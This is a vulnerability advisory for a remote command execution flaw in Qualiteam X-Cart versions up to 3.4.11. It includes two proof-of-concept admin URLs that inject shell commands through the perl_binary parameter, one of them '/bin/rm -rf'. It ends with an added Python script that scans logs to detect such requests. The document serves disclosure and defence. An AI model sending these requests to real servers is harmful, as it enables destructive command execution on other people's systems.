

Title: Qualiteam X-Cart Remote Command Execution Vulnerability
Published: 2004-02-03-12:00AM
Updated: 2004-02-26-06:08PM
Class: Input Validation Error
CVE: CAN-2004-0241
Remote: Yes
Local: No
Credit: Discovery of this issue has been credited to Philip <securityfocus@magicwebsolutions.co.uk>.

Vulnerable:
  Qualiteam XCart 3.4.11
  Qualiteam XCart 3.4.3
  Qualiteam XCart 3.4.0
  Qualiteam XCart 3.3.2
  Qualiteam XCart 3.3.0
  Qualiteam XCart 3.2.1
  Qualiteam XCart 3.2.0

Not Vulnerable:
  Qualiteam X-Cart 3.5.4
  Qualiteam X-Cart 3.5.2
  Qualiteam X-Cart 3.5.1
  Qualiteam X-Cart 3.5.0
  Qualiteam X-Cart 3.4.12

Code: No exploit is required to leverage this issue. The following proof of concept has been provided:

http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..

http://server/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR ||
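
Detection: both proof-of-concept requests supply the Perl binary path (and, in the first, patch_exe) as request parameters to an admin script. The following Python example is added here and is not part of the original advisory; it flags such requests in web server access logs. The Common Log Format layout, client addresses and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the two proof-of-concept URLs in this advisory.
SUSPECT_PARAM = re.compile(
    r"^(perl_binary|patch_exe|config\[[^\]]*\]\[perl_binary\])$")
# Admin scripts named in the proof-of-concept URLs.
ADMIN_SCRIPTS = ("/admin/upgrade.php", "/admin/general.php")
# Request field of a Common Log Format line (assumed log layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return (name, value) pairs that try to set the Perl binary or patch_exe."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ADMIN_SCRIPTS):
        return []
    # parse_qsl percent-decodes names, so config%5BGeneral%5D... also matches.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if SUSPECT_PARAM.match(k)]

def scan(lines):
    """Yield (line_number, hits) for every log line carrying such parameters."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Feb/2004:10:00:01 +0000] "GET /admin/general.php'
    '?mode=perlinfo&config%5BGeneral%5D%5Bperl_binary%5D=/bin/ls%20-lR%20||'
    ' HTTP/1.0" 200 512',
    '203.0.113.7 - - [03/Feb/2004:10:00:05 +0000] "GET /admin/upgrade.php'
    '?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION'
    '&perl_binary=/bin/ls&patch_exe=.. HTTP/1.0" 200 640',
    '198.51.100.4 - - [03/Feb/2004:10:01:00 +0000] "GET /admin/general.php'
    '?mode=perlinfo HTTP/1.0" 200 2048',
    '198.51.100.4 - - [03/Feb/2004:10:02:00 +0000] "GET /product.php'
    '?productid=12 HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Access logs record only the query string, so the same parameters sent in a POST body would need request-body logging to be seen.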

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:43:45 +0000
